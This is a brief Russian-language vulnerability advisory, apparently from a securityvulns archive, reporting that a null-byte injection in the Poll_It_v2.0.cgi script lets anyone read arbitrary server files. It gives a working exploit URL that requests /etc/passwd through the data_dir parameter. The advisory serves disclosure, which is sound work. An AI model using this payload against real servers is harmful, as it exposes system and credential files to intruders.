Используя "ядовитый NUll" можно получить любой файл с сервера:http://www.targethost.com/pollit/Poll_It_v2.0.cgi?data_dir=\etc\passwd%00
vulners.com/securityvulns/securityvulns:doc:427